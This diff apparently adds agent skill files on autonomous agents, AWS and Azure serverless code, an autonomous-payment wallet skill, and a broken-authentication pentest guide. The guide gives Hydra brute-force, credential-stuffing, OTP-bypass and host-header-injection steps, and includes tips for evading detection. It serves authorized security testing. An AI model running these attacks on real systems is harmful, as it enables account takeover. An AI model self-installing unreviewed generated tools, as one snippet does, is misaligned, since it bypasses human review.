        Create a Python MCP server with a tool that does:
        {description}

        Use the FastMCP framework. Include proper error handling.
        Return only the Python code.
        """)

        # Save and install
        server_name = self._extract_name(description)
        path = f"./mcp_servers/{server_name}/server.py"

        with open(path, 'w') as f:
            f.write(code)

        # Hot-reload
        self.connect_server(server_name, {"path": path})

        return f"Created tool: {server_name}"
```

---

## Best Practices Checklist

### Agent Design

- [ ] Clear task decomposition
- [ ] Appropriate tool granularity
- [ ] Error handling at each step
- [ ] Progress visibility to user

### Safety

- [ ] Permission system implemented
- [ ] Dangerous operations blocked
- [ ] Sandbox for untrusted code
- [ ] Audit logging enabled

### UX

- [ ] Approval UI is clear
- [ ] Progress updates provided
- [ ] Undo/rollback available
- [ ] Explanation of actions

---

## Resources

- [Cline](https://github.com/cline/cline)
- [OpenAI Codex](https://github.com/openai/codex)
- [Model Context Protocol](https://modelcontextprotocol.io/)
- [Anthropic Tool Use](https://docs.anthropic.com/claude/docs/tool-use)
68
skills/autonomous-agents/SKILL.md
Normal file
@@ -0,0 +1,68 @@

---
name: autonomous-agents
description: "Autonomous agents are AI systems that can independently decompose goals, plan actions, execute tools, and self-correct without constant human guidance. The challenge isn't making them capable - it's making them reliable. Every extra decision multiplies failure probability. This skill covers agent loops (ReAct, Plan-Execute), goal decomposition, reflection patterns, and production reliability. Key insight: compounding error rates kill autonomous agents. A 95% success rate per step drops to 60% by step 10."
source: vibeship-spawner-skills (Apache 2.0)
---

# Autonomous Agents

You are an agent architect who has learned the hard lessons of autonomous AI.
You've seen the gap between impressive demos and production disasters. You know
that a 95% success rate per step means only 60% by step 10.

Your core insight: Autonomy is earned, not granted. Start with heavily
constrained agents that do one thing reliably. Add autonomy only as you prove
reliability. The best agents look less impressive but work consistently.
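
The compounding arithmetic behind that claim is one line of Python: per-step success `p` survives `n` sequential steps with probability `p ** n`.

```python
# End-to-end success of an n-step chain with 95% per-step reliability
for n in (1, 5, 10, 20):
    print(f"{n:>2} steps: {0.95 ** n:.0%}")
```

Ten steps land at roughly 60%, and twenty at roughly 36%, which is why cutting step count is the single highest-leverage reliability fix.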

You push for guardrails before capabilities, and logging before autonomy.

## Capabilities

- autonomous-agents
- agent-loops
- goal-decomposition
- self-correction
- reflection-patterns
- react-pattern
- plan-execute
- agent-reliability
- agent-guardrails

## Patterns

### ReAct Agent Loop

Alternating reasoning and action steps
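
A dependency-free sketch of the loop. `fake_llm` is a stub standing in for a real model call, and the step shape (`thought` / `action` / `answer`) is an assumed convention for illustration, not a fixed API:

```python
def react_loop(llm, tools, question, max_steps=5):
    transcript = f"Question: {question}"
    for _ in range(max_steps):
        step = llm(transcript)                      # reason
        transcript += f"\nThought: {step['thought']}"
        if step.get("answer") is not None:          # model chose to finish
            return step["answer"]
        obs = tools[step["action"]](step["input"])  # act
        transcript += f"\nAction: {step['action']}\nObservation: {obs}"
    raise RuntimeError("Step budget exhausted")

# Stub model: first call requests a tool, second call answers.
state = {"calls": 0}
def fake_llm(transcript):
    state["calls"] += 1
    if state["calls"] == 1:
        return {"thought": "I should add the numbers", "action": "add", "input": (2, 3)}
    return {"thought": "I have the result", "answer": 5}

print(react_loop(fake_llm, {"add": lambda args: sum(args)}, "What is 2 + 3?"))  # 5
```

The hard `max_steps` cap is the guardrail: without it, a confused model loops until the budget or the API bill stops it.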

### Plan-Execute Pattern

Separate planning phase from execution
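
In sketch form, with stubbed planner and executor (real versions would be model calls):

```python
def plan_execute(planner, executor, goal):
    plan = planner(goal)          # one up-front planning call
    results = []
    for step in plan:             # execution never re-plans
        results.append(executor(step))
    return results

out = plan_execute(
    planner=lambda goal: ["locate the bug", "write a fix", "run the tests"],
    executor=lambda step: f"done: {step}",
    goal="fix failing test",
)
print(out)
```

Fixing the plan up front makes the run auditable before any tool touches the workspace, at the cost of not adapting when a step's outcome invalidates later steps.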

### Reflection Pattern

Self-evaluation and iterative improvement
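
A sketch of the critique-revise loop (all three callables are stubs; a real `critique` would be a second model pass that returns `None` when satisfied):

```python
def reflect(generate, critique, revise, task, max_rounds=3):
    draft = generate(task)
    for _ in range(max_rounds):
        feedback = critique(task, draft)
        if feedback is None:      # critic is satisfied
            return draft
        draft = revise(task, draft, feedback)
    return draft                  # best effort after the round budget

result = reflect(
    generate=lambda t: "drft",
    critique=lambda t, d: "spelling" if d == "drft" else None,
    revise=lambda t, d, fb: "draft",
    task="write a word",
)
print(result)  # draft
```

The bounded `max_rounds` matters for the same compounding-cost reason as the ReAct step cap: each extra round is another model call that may not converge.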

## Anti-Patterns

### ❌ Unbounded Autonomy

### ❌ Trusting Agent Outputs

### ❌ General-Purpose Autonomy

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | Reduce step count |
| Issue | critical | Set hard cost limits |
| Issue | critical | Test at scale before production |
| Issue | high | Validate against ground truth |
| Issue | high | Build robust API clients |
| Issue | high | Least privilege principle |
| Issue | medium | Track context usage |
| Issue | medium | Structured logging |

## Related Skills

Works well with: `agent-tool-builder`, `agent-memory-systems`, `multi-agent-orchestration`, `agent-evaluation`
323
skills/aws-serverless/SKILL.md
Normal file
@@ -0,0 +1,323 @@

---
name: aws-serverless
description: "Specialized skill for building production-ready serverless applications on AWS. Covers Lambda functions, API Gateway, DynamoDB, SQS/SNS event-driven patterns, SAM/CDK deployment, and cold start optimization."
source: vibeship-spawner-skills (Apache 2.0)
---

# AWS Serverless

## Patterns

### Lambda Handler Pattern

Proper Lambda function structure with error handling

**When to use**: any Lambda function implementation (API handlers, event processors, scheduled tasks).

```javascript
// Node.js Lambda Handler
// handler.js

// Initialize outside handler (reused across invocations)
const { DynamoDBClient } = require('@aws-sdk/client-dynamodb');
const { DynamoDBDocumentClient, GetCommand } = require('@aws-sdk/lib-dynamodb');

const client = new DynamoDBClient({});
const docClient = DynamoDBDocumentClient.from(client);

// Handler function
exports.handler = async (event, context) => {
  // Optional: Don't wait for event loop to clear (Node.js)
  context.callbackWaitsForEmptyEventLoop = false;

  try {
    // Parse input based on event source
    const body = typeof event.body === 'string'
      ? JSON.parse(event.body)
      : event.body;

    // Business logic
    const result = await processRequest(body);

    // Return API Gateway compatible response
    return {
      statusCode: 200,
      headers: {
        'Content-Type': 'application/json',
        'Access-Control-Allow-Origin': '*'
      },
      body: JSON.stringify(result)
    };
  } catch (error) {
    console.error('Error:', JSON.stringify({
      error: error.message,
      stack: error.stack,
      requestId: context.awsRequestId
    }));

    return {
      statusCode: error.statusCode || 500,
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        error: error.message || 'Internal server error'
      })
    };
  }
};

async function processRequest(data) {
  // Your business logic here
  const result = await docClient.send(new GetCommand({
    TableName: process.env.TABLE_NAME,
    Key: { id: data.id }
  }));
  return result.Item;
}
```

```python
# Python Lambda Handler
# handler.py

import json
import os
import logging
import boto3
from botocore.exceptions import ClientError

# Initialize outside handler (reused across invocations)
logger = logging.getLogger()
logger.setLevel(logging.INFO)

dynamodb = boto3.resource('dynamodb')
table = dynamodb.Table(os.environ['TABLE_NAME'])

def handler(event, context):
    try:
        # Parse input based on event source
        body = json.loads(event['body']) if isinstance(event.get('body'), str) else event.get('body')

        # Business logic
        item = table.get_item(Key={'id': body['id']}).get('Item')

        # Return API Gateway compatible response
        return {
            'statusCode': 200,
            'headers': {'Content-Type': 'application/json'},
            'body': json.dumps(item)
        }
    except ClientError as e:
        logger.error('Error: %s (request %s)', e, context.aws_request_id)
        return {
            'statusCode': 500,
            'headers': {'Content-Type': 'application/json'},
            'body': json.dumps({'error': 'Internal server error'})
        }
```

### API Gateway Integration Pattern

REST API and HTTP API integration with Lambda

**When to use**: building REST APIs backed by Lambda; you need HTTP endpoints for functions.

```yaml
# template.yaml (SAM)
AWSTemplateFormatVersion: '2010-09-09'
Transform: AWS::Serverless-2016-10-31

Globals:
  Function:
    Runtime: nodejs20.x
    Timeout: 30
    MemorySize: 256
    Environment:
      Variables:
        TABLE_NAME: !Ref ItemsTable

Resources:
  # HTTP API (recommended for simple use cases)
  HttpApi:
    Type: AWS::Serverless::HttpApi
    Properties:
      StageName: prod
      CorsConfiguration:
        AllowOrigins:
          - "*"
        AllowMethods:
          - GET
          - POST
          - DELETE
        AllowHeaders:
          - "*"

  # Lambda Functions
  GetItemFunction:
    Type: AWS::Serverless::Function
    Properties:
      Handler: src/handlers/get.handler
      Events:
        GetItem:
          Type: HttpApi
          Properties:
            ApiId: !Ref HttpApi
            Path: /items/{id}
            Method: GET
      Policies:
        - DynamoDBReadPolicy:
            TableName: !Ref ItemsTable

  CreateItemFunction:
    Type: AWS::Serverless::Function
    Properties:
      Handler: src/handlers/create.handler
      Events:
        CreateItem:
          Type: HttpApi
          Properties:
            ApiId: !Ref HttpApi
            Path: /items
            Method: POST
      Policies:
        - DynamoDBCrudPolicy:
            TableName: !Ref ItemsTable

  # DynamoDB Table
  ItemsTable:
    Type: AWS::DynamoDB::Table
    Properties:
      AttributeDefinitions:
        - AttributeName: id
          AttributeType: S
      KeySchema:
        - AttributeName: id
          KeyType: HASH
      BillingMode: PAY_PER_REQUEST

Outputs:
  ApiUrl:
    Value: !Sub "https://${HttpApi}.execute-api.${AWS::Region}.amazonaws.com/prod"
```

```javascript
// src/handlers/get.js
const { getItem } = require('../lib/dynamodb');

exports.handler = async (event) => {
  const id = event.pathParameters?.id;

  if (!id) {
    return {
      statusCode: 400,
      body: JSON.stringify({ error: 'Missing id parameter' })
    };
  }

  const item = await getItem(id);

  if (!item) {
    return {
      statusCode: 404,
      body: JSON.stringify({ error: 'Item not found' })
    };
  }

  return {
    statusCode: 200,
    body: JSON.stringify(item)
  };
};
```

### Event-Driven SQS Pattern

Lambda triggered by SQS for reliable async processing

**When to use**: decoupled, asynchronous processing; you need retry logic and a DLQ; processing messages in batches.

```yaml
# template.yaml
Resources:
  ProcessorFunction:
    Type: AWS::Serverless::Function
    Properties:
      Handler: src/handlers/processor.handler
      Events:
        SQSEvent:
          Type: SQS
          Properties:
            Queue: !GetAtt ProcessingQueue.Arn
            BatchSize: 10
            FunctionResponseTypes:
              - ReportBatchItemFailures # Partial batch failure handling

  ProcessingQueue:
    Type: AWS::SQS::Queue
    Properties:
      VisibilityTimeout: 180 # 6x Lambda timeout
      RedrivePolicy:
        deadLetterTargetArn: !GetAtt DeadLetterQueue.Arn
        maxReceiveCount: 3

  DeadLetterQueue:
    Type: AWS::SQS::Queue
    Properties:
      MessageRetentionPeriod: 1209600 # 14 days
```

```javascript
// src/handlers/processor.js
exports.handler = async (event) => {
  const batchItemFailures = [];

  for (const record of event.Records) {
    try {
      const body = JSON.parse(record.body);
      await processMessage(body);
    } catch (error) {
      console.error(`Failed to process message ${record.messageId}:`, error);
      // Report this item as failed (will be retried)
      batchItemFailures.push({
        itemIdentifier: record.messageId
      });
    }
  }

  // Return failed items for retry
  return { batchItemFailures };
};

async function processMessage(message) {
  // Your processing logic
  console.log('Processing:', message);

  // Simulate work
  await saveToDatabase(message);
}
```

```python
# Python version
import json
import logging

logger = logging.getLogger()

def handler(event, context):
    batch_item_failures = []

    for record in event['Records']:
        try:
            body = json.loads(record['body'])
            process_message(body)
        except Exception as e:
            logger.error(f"Failed to process {record['messageId']}: {e}")
            batch_item_failures.append({
                'itemIdentifier': record['messageId']
            })

    return {'batchItemFailures': batch_item_failures}
```

## Anti-Patterns

### ❌ Monolithic Lambda

**Why bad**: Large deployment packages cause slow cold starts.
Hard to scale individual operations.
Updates affect entire system.

### ❌ Large Dependencies

**Why bad**: Increases deployment package size.
Slows down cold starts significantly.
Most of SDK/library may be unused.

### ❌ Synchronous Calls in VPC

**Why bad**: VPC-attached Lambdas have ENI setup overhead.
Blocking DNS lookups or connections worsen cold starts.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | high | Measure your INIT phase |
| Issue | high | Set appropriate timeout |
| Issue | high | Increase memory allocation |
| Issue | medium | Verify VPC configuration |
| Issue | medium | Tell Lambda not to wait for event loop |
| Issue | medium | For large file uploads |
| Issue | high | Use different buckets/prefixes |
42
skills/azure-functions/SKILL.md
Normal file
@@ -0,0 +1,42 @@

---
name: azure-functions
description: "Expert patterns for Azure Functions development including isolated worker model, Durable Functions orchestration, cold start optimization, and production patterns. Covers .NET, Python, and Node.js programming models. Use when: azure function, azure functions, durable functions, azure serverless, function app."
source: vibeship-spawner-skills (Apache 2.0)
---

# Azure Functions

## Patterns

### Isolated Worker Model (.NET)

Modern .NET execution model with process isolation

### Node.js v4 Programming Model

Modern code-centric approach for TypeScript/JavaScript

### Python v2 Programming Model

Decorator-based approach for Python functions

## Anti-Patterns

### ❌ Blocking Async Calls

### ❌ New HttpClient Per Request

### ❌ In-Process Model for New Projects

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | high | Use async pattern with Durable Functions |
| Issue | high | Use IHttpClientFactory (Recommended) |
| Issue | high | Always use async/await |
| Issue | medium | Configure maximum timeout (Consumption) |
| Issue | high | Use isolated worker for new projects |
| Issue | medium | Configure Application Insights properly |
| Issue | medium | Check extension bundle (most common) |
| Issue | medium | Add warmup trigger to initialize your code |
292
skills/blockrun/SKILL.md
Normal file
@@ -0,0 +1,292 @@
---
name: blockrun
description: Use when user needs capabilities Claude lacks (image generation, real-time X/Twitter data) or explicitly requests external models ("blockrun", "use grok", "use gpt", "dall-e", "deepseek")
allowed-tools: Read, Bash(python:*), Bash(python3:*), Bash(pip:*), Bash(source:*)
---

# BlockRun

**BlockRun works with Claude Code and Google Antigravity.**

You can't generate images. You have no real-time X/Twitter access. BlockRun gives you these capabilities.

## Philosophy

You have a wallet. When you need a capability you lack, you pay for it autonomously.

| You Need | You Call | Pricing |
|----------|----------|---------|
| Image generation | DALL-E | $0.04/image |
| Real-time X data | Grok + Live Search | $0.025/source |
| Second opinion | GPT-5.2 | $1.75/M input, $14/M output |
| Cheaper processing | DeepSeek | $0.14/M input, $0.28/M output |

**How it works:** BlockRun uses x402 micropayments to route your requests to OpenAI, xAI, Google, and other providers. No API keys needed - your wallet pays per token.

## Budget Control (Optional)

If the user specifies a budget (e.g., "use at most $1"), track spending and stop when the budget is reached:

```python
from blockrun_llm import setup_agent_wallet

client = setup_agent_wallet()
budget = 1.0  # User's budget

# Before each call, check if within budget
spending = client.get_spending()
if spending['total_usd'] >= budget:
    print(f"Budget reached: ${spending['total_usd']:.4f} spent")
    # Stop making calls
else:
    response = client.chat("openai/gpt-5.2", "Hello!")

# At the end, report spending
spending = client.get_spending()
print(f"💰 Total spent: ${spending['total_usd']:.4f} across {spending['calls']} calls")
```

## When to Use

| Trigger | Your Action |
|---------|-------------|
| User explicitly requests ("blockrun second opinion with GPT on...", "use grok to check...", "generate image with dall-e") | Execute via BlockRun |
| User needs something you can't do (images, live X data) | Suggest BlockRun, wait for confirmation |
| You can handle the task fine | Do it yourself, don't mention BlockRun |

## Example User Prompts

Users will say things like:

| User Says | What You Do |
|-----------|-------------|
| "blockrun generate an image of a sunset" | Call DALL-E via ImageClient |
| "use grok to check what's trending on X" | Call Grok with `search=True` |
| "blockrun GPT review this code" | Call GPT-5.2 via LLMClient |
| "what's the latest news about AI agents?" | Suggest Grok (you lack real-time data) |
| "generate a logo for my startup" | Suggest DALL-E (you can't generate images) |
| "blockrun check my balance" | Show wallet balance via `get_balance()` |
| "blockrun deepseek summarize this file" | Call DeepSeek for cost savings |

## Wallet & Balance

Use `setup_agent_wallet()` to auto-create a wallet and get a client. This shows the QR code and welcome message on first use.

**Initialize client (always start with this):**
```python
from blockrun_llm import setup_agent_wallet

client = setup_agent_wallet()  # Auto-creates wallet, shows QR if new
```

**Check balance (when user asks "show balance", "check wallet", etc.):**
```python
balance = client.get_balance()  # On-chain USDC balance
print(f"Balance: ${balance:.2f} USDC")
print(f"Wallet: {client.get_wallet_address()}")
```

**Show QR code for funding:**
```python
from blockrun_llm import generate_wallet_qr_ascii, get_wallet_address

# ASCII QR for terminal display
print(generate_wallet_qr_ascii(get_wallet_address()))
```

## SDK Usage

**Prerequisite:** Install the SDK with `pip install blockrun-llm`

### Basic Chat
```python
from blockrun_llm import setup_agent_wallet

client = setup_agent_wallet()  # Auto-creates wallet if needed
response = client.chat("openai/gpt-5.2", "What is 2+2?")
print(response)

# Check spending
spending = client.get_spending()
print(f"Spent ${spending['total_usd']:.4f}")
```

### Real-time X/Twitter Search (xAI Live Search)

**IMPORTANT:** For real-time X/Twitter data, you MUST enable Live Search with `search=True` or `search_parameters`.

```python
from blockrun_llm import setup_agent_wallet

client = setup_agent_wallet()

# Simple: enable live search with search=True
response = client.chat(
    "xai/grok-3",
    "What are the latest posts from @blockrunai on X?",
    search=True  # Enables real-time X/Twitter search
)
print(response)
```

### Advanced X Search with Filters

```python
from blockrun_llm import setup_agent_wallet

client = setup_agent_wallet()

response = client.chat(
    "xai/grok-3",
    "Analyze @blockrunai's recent content and engagement",
    search_parameters={
        "mode": "on",
        "sources": [
            {
                "type": "x",
                "included_x_handles": ["blockrunai"],
                "post_favorite_count": 5
            }
        ],
        "max_search_results": 20,
        "return_citations": True
    }
)
print(response)
```

### Image Generation
```python
from blockrun_llm import ImageClient

client = ImageClient()
result = client.generate("A cute cat wearing a space helmet")
print(result.data[0].url)
```
## xAI Live Search Reference

Live Search is xAI's real-time data API. Cost: **$0.025 per source** (default 10 sources = $0.25).

To reduce costs, set `max_search_results` to a lower value:
```python
# Only use 5 sources (~$0.13)
response = client.chat("xai/grok-3", "What's trending?",
    search_parameters={"mode": "on", "max_search_results": 5})
```
### Search Parameters

| Parameter | Type | Default | Description |
|-----------|------|---------|-------------|
| `mode` | string | "auto" | "off", "auto", or "on" |
| `sources` | array | web,news,x | Data sources to query |
| `return_citations` | bool | true | Include source URLs |
| `from_date` | string | - | Start date (YYYY-MM-DD) |
| `to_date` | string | - | End date (YYYY-MM-DD) |
| `max_search_results` | int | 10 | Max sources to return (customize to control cost) |
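Putting the parameters together, a date-bounded, cost-capped query payload might look like this (a sketch with illustrative values; the field names come from the table above):

```python
# Illustrative search_parameters payload assembled from the table above.
# The date range and result cap are example values, not defaults.
search_parameters = {
    "mode": "on",                               # force live search on
    "sources": [{"type": "news", "country": "US"}],
    "from_date": "2025-01-01",                  # YYYY-MM-DD
    "to_date": "2025-01-31",
    "max_search_results": 5,                    # 5 sources at $0.025/source
    "return_citations": True,
}

# Estimated fixed search fee for this call
est_cost = search_parameters["max_search_results"] * 0.025
print(f"~${est_cost:.3f} in search fees")  # ~$0.125 in search fees
```

Pass the dict as the `search_parameters` keyword of `client.chat(...)`, as shown in the Advanced X Search example.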
### Source Types

**X/Twitter Source:**
```python
{
    "type": "x",
    "included_x_handles": ["handle1", "handle2"],  # Max 10
    "excluded_x_handles": ["spam_account"],        # Max 10
    "post_favorite_count": 100,                    # Min likes threshold
    "post_view_count": 1000                        # Min views threshold
}
```

**Web Source:**
```python
{
    "type": "web",
    "country": "US",                      # ISO alpha-2 code
    "allowed_websites": ["example.com"],  # Max 5
    "safe_search": True
}
```

**News Source:**
```python
{
    "type": "news",
    "country": "US",
    "excluded_websites": ["tabloid.com"]  # Max 5
}
```

## Available Models

| Model | Best For | Pricing |
|-------|----------|---------|
| `openai/gpt-5.2` | Second opinions, code review, general | $1.75/M in, $14/M out |
| `openai/gpt-5-mini` | Cost-optimized reasoning | $0.30/M in, $1.20/M out |
| `openai/o4-mini` | Latest efficient reasoning | $1.10/M in, $4.40/M out |
| `openai/o3` | Advanced reasoning, complex problems | $10/M in, $40/M out |
| `xai/grok-3` | Real-time X/Twitter data | $3/M + $0.025/source |
| `deepseek/deepseek-chat` | Simple tasks, bulk processing | $0.14/M in, $0.28/M out |
| `google/gemini-2.5-flash` | Very long documents, fast | $0.15/M in, $0.60/M out |
| `openai/dall-e-3` | Photorealistic images | $0.04/image |
| `google/nano-banana` | Fast, artistic images | $0.01/image |

*M = million tokens. Actual cost depends on your prompt and response length.*

## Cost Reference

All LLM costs are per million tokens (M = 1,000,000 tokens).

| Model | Input | Output |
|-------|-------|--------|
| GPT-5.2 | $1.75/M | $14.00/M |
| GPT-5-mini | $0.30/M | $1.20/M |
| Grok-3 (no search) | $3.00/M | $15.00/M |
| DeepSeek | $0.14/M | $0.28/M |
| Fixed Cost Actions | Cost |
|--------------------|------|
| Grok Live Search | $0.025/source (default 10 = $0.25) |
| DALL-E image | $0.04/image |
| Nano Banana image | $0.01/image |

**Typical costs:** A 500-word prompt (~750 tokens) to GPT-5.2 costs ~$0.001 input. A 1000-word response (~1500 tokens) costs ~$0.02 output.
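That arithmetic can be wrapped in a small helper for pre-call estimates (a hypothetical utility, not part of the SDK; the rates are copied from the table above):

```python
# Hypothetical helper: estimate a call's cost from the rate table above.
# Rates are USD per million tokens as (input, output).
RATES = {
    "openai/gpt-5.2": (1.75, 14.00),
    "openai/gpt-5-mini": (0.30, 1.20),
    "deepseek/deepseek-chat": (0.14, 0.28),
}

def estimate_cost(model, input_tokens, output_tokens):
    """Return estimated USD cost for one chat call."""
    rate_in, rate_out = RATES[model]
    return (input_tokens * rate_in + output_tokens * rate_out) / 1_000_000

# 750-token prompt + 1500-token response to GPT-5.2
print(f"${estimate_cost('openai/gpt-5.2', 750, 1500):.4f}")  # $0.0223
```

Useful when honoring a user budget: estimate before calling, then confirm against `client.get_spending()` afterwards.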
## Setup & Funding

**Wallet location:** `$HOME/.blockrun/.session` (e.g., `/Users/username/.blockrun/.session`)

**First-time setup:**

1. Wallet auto-creates when `setup_agent_wallet()` is called
2. Check wallet and balance:
   ```python
   from blockrun_llm import setup_agent_wallet
   client = setup_agent_wallet()
   print(f"Wallet: {client.get_wallet_address()}")
   print(f"Balance: ${client.get_balance():.2f} USDC")
   ```
3. Fund wallet with $1-5 USDC on Base network

**Show QR code for funding (ASCII for terminal):**
```python
from blockrun_llm import generate_wallet_qr_ascii, get_wallet_address
print(generate_wallet_qr_ascii(get_wallet_address()))
```

## Troubleshooting

**"Grok says it has no real-time access"**
→ You forgot to enable Live Search. Add `search=True`:
```python
response = client.chat("xai/grok-3", "What's trending?", search=True)
```

**Module not found**
→ Install the SDK: `pip install blockrun-llm`

## Updates

```bash
pip install --upgrade blockrun-llm
```
473 skills/broken-authentication/SKILL.md Normal file
@@ -0,0 +1,473 @@
---
name: Broken Authentication Testing
description: This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". It provides comprehensive techniques for identifying authentication and session management weaknesses in web applications.
---

# Broken Authentication Testing

## Purpose

Identify and exploit authentication and session management vulnerabilities in web applications. Broken authentication consistently ranks in the OWASP Top 10 and can lead to account takeover, identity theft, and unauthorized access to sensitive systems. This skill covers testing methodologies for password policies, session handling, multi-factor authentication, and credential management.

## Prerequisites

### Required Knowledge
- HTTP protocol and session mechanisms
- Authentication types (SFA, 2FA, MFA)
- Cookie and token handling
- Common authentication frameworks

### Required Tools
- Burp Suite Professional or Community
- Hydra or similar brute-force tools
- Custom wordlists for credential testing
- Browser developer tools

### Required Access
- Target application URL
- Test account credentials
- Written authorization for testing

## Outputs and Deliverables

1. **Authentication Assessment Report** - Document all identified vulnerabilities
2. **Credential Testing Results** - Brute-force and dictionary attack outcomes
3. **Session Security Analysis** - Token randomness and timeout evaluation
4. **Remediation Recommendations** - Security hardening guidance

## Core Workflow

### Phase 1: Authentication Mechanism Analysis

Understand the application's authentication architecture:

```
# Identify authentication type
- Password-based (forms, basic auth, digest)
- Token-based (JWT, OAuth, API keys)
- Certificate-based (mutual TLS)
- Multi-factor (SMS, TOTP, hardware tokens)

# Map authentication endpoints
/login, /signin, /authenticate
/register, /signup
/forgot-password, /reset-password
/logout, /signout
/api/auth/*, /oauth/*
```

Capture and analyze authentication requests:

```http
POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

username=test&password=test123
```

### Phase 2: Password Policy Testing

Evaluate password requirements and enforcement:

```bash
# Test minimum length (a, ab, abcdefgh)
# Test complexity (password, password1, Password1!)
# Test common weak passwords (123456, password, qwerty, admin)
# Test username as password (admin/admin, test/test)
```

Document policy gaps: minimum length <8, no complexity, common passwords allowed, username as password.

### Phase 3: Credential Enumeration

Test for username enumeration vulnerabilities:
```bash
# Compare responses for valid vs invalid usernames
# Invalid: "Invalid username" vs Valid: "Invalid password"
# Check timing differences, response codes, registration messages

# Password reset
"Email sent if account exists" (secure)
"No account with that email" (leaks info)

# API responses
{"error": "user_not_found"}
{"error": "invalid_password"}
```
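The differential comparison described above can be mechanized by diffing the observable attributes of two login attempts (a standalone sketch; the response values are synthetic examples, not from a real target):

```python
# Compare two login responses (status, length, message) for signals
# that reveal whether a username exists.
def enumeration_signals(resp_invalid_user, resp_valid_user):
    """Return the response attributes that differ between the two attempts."""
    signals = []
    for field in ("status", "length", "message"):
        if resp_invalid_user.get(field) != resp_valid_user.get(field):
            signals.append(field)
    return signals

# Synthetic example: differing error messages leak account existence
a = {"status": 200, "length": 1204, "message": "Invalid username"}
b = {"status": 200, "length": 1210, "message": "Invalid password"}
print(enumeration_signals(a, b))  # ['length', 'message']
```

An empty result across many username pairs suggests uniform error handling; any recurring difference is an enumeration finding.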
### Phase 4: Brute Force Testing

Test account lockout and rate limiting:

```bash
# Using Hydra for form-based auth
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  target.com http-post-form \
  "/login:username=^USER^&password=^PASS^:Invalid credentials"

# Using Burp Intruder
1. Capture login request
2. Send to Intruder
3. Set payload positions on password field
4. Load wordlist
5. Start attack
6. Analyze response lengths/codes
```

Check for protections:

```bash
# Account lockout
- After how many attempts?
- Duration of lockout?
- Lockout notification?

# Rate limiting
- Requests per minute limit?
- IP-based or account-based?
- Bypass via headers (X-Forwarded-For)?

# CAPTCHA
- After failed attempts?
- Easily bypassable?
```

### Phase 5: Credential Stuffing

Test with known breached credentials:

```bash
# Credential stuffing differs from brute force
# Uses known email:password pairs from breaches

# Using Burp Intruder with Pitchfork attack
1. Set username and password as positions
2. Load email list as payload 1
3. Load password list as payload 2 (matched pairs)
4. Analyze for successful logins

# Detection evasion
- Slow request rate
- Rotate source IPs
- Randomize user agents
- Add delays between attempts
```

### Phase 6: Session Management Testing

Analyze session token security:

```bash
# Capture session cookie
Cookie: SESSIONID=abc123def456

# Test token characteristics
1. Entropy - Is it random enough?
2. Length - Sufficient length (128+ bits)?
3. Predictability - Sequential patterns?
4. Secure flags - HttpOnly, Secure, SameSite?
```

Session token analysis:

```python
#!/usr/bin/env python3
import requests

# Collect multiple session tokens
tokens = []
for i in range(100):
    response = requests.get("https://target.com/login")
    token = response.cookies.get("SESSIONID")
    tokens.append(token)

# Analyze for patterns
# Check for sequential increments
# Calculate entropy
# Look for timestamp components
```
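The entropy check mentioned in the comments above can be sketched with a Shannon estimate over the pooled token characters (standalone; the tokens here are synthetic, stand-ins for ones collected as shown):

```python
import math
from collections import Counter

def shannon_entropy_bits_per_char(tokens):
    """Shannon entropy (bits per character) over all characters in the sample."""
    counts = Counter("".join(tokens))
    total = sum(counts.values())
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

# Synthetic examples: sequential tokens score far lower than random-looking ones
sequential = ["session0001", "session0002", "session0003"]
randomish = ["k9x2mqp7vw1", "c4zr8htj3bn", "q6wd5ylg0fs"]
print(f"{shannon_entropy_bits_per_char(sequential):.2f} bits/char")
print(f"{shannon_entropy_bits_per_char(randomish):.2f} bits/char")
```

A low bits-per-char figure on a large sample is only a first signal; statistical suites (e.g., Burp Sequencer) give a fuller verdict.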
### Phase 7: Session Fixation Testing

Test if the session is regenerated after authentication:

```bash
# Step 1: Get session before login
GET /login HTTP/1.1
Response: Set-Cookie: SESSIONID=abc123

# Step 2: Login with same session
POST /login HTTP/1.1
Cookie: SESSIONID=abc123
username=valid&password=valid

# Step 3: Check if session changed
# VULNERABLE if SESSIONID remains abc123
# SECURE if new session assigned after login
```

Attack scenario:

```bash
# Attacker workflow:
1. Attacker visits site, gets session: SESSIONID=attacker_session
2. Attacker sends link to victim with fixed session:
   https://target.com/login?SESSIONID=attacker_session
3. Victim logs in with attacker's session
4. Attacker now has authenticated session
```

### Phase 8: Session Timeout Testing

Verify session expiration policies:

```bash
# Test idle timeout
1. Login and note session cookie
2. Wait without activity (15, 30, 60 minutes)
3. Attempt to use session
4. Check if session is still valid

# Test absolute timeout
1. Login and continuously use session
2. Check if forced logout after set period (8 hours, 24 hours)

# Test logout functionality
1. Login and note session
2. Click logout
3. Attempt to reuse old session cookie
4. Session should be invalidated server-side
```

### Phase 9: Multi-Factor Authentication Testing

Assess MFA implementation security:

```bash
# OTP brute force
- 4-digit OTP = 10,000 combinations
- 6-digit OTP = 1,000,000 combinations
- Test rate limiting on OTP endpoint

# OTP bypass techniques
- Skip MFA step by direct URL access
- Modify response to indicate MFA passed
- Null/empty OTP submission
- Previous valid OTP reuse

# API Version Downgrade Attack (crAPI example)
# If /api/v3/check-otp has rate limiting, try older versions:
POST /api/v2/check-otp
{"otp": "1234"}
# Older API versions may lack security controls

# Using Burp for OTP testing
1. Capture OTP verification request
2. Send to Intruder
3. Set OTP field as payload position
4. Use numbers payload (0000-9999)
5. Check for successful bypass
```

Test MFA enrollment:

```bash
# Forced enrollment
- Can MFA be skipped during setup?
- Can backup codes be accessed without verification?

# Recovery process
- Can MFA be disabled via email alone?
- Social engineering potential?
```

### Phase 10: Password Reset Testing

Analyze password reset security:

```bash
# Token security
1. Request password reset
2. Capture reset link
3. Analyze token:
   - Length and randomness
   - Expiration time
   - Single-use enforcement
   - Account binding

# Token manipulation
https://target.com/reset?token=abc123&user=victim
# Try changing user parameter while using valid token

# Host header injection
POST /forgot-password HTTP/1.1
Host: attacker.com
email=victim@email.com
# Reset email may contain attacker's domain
```
## Quick Reference

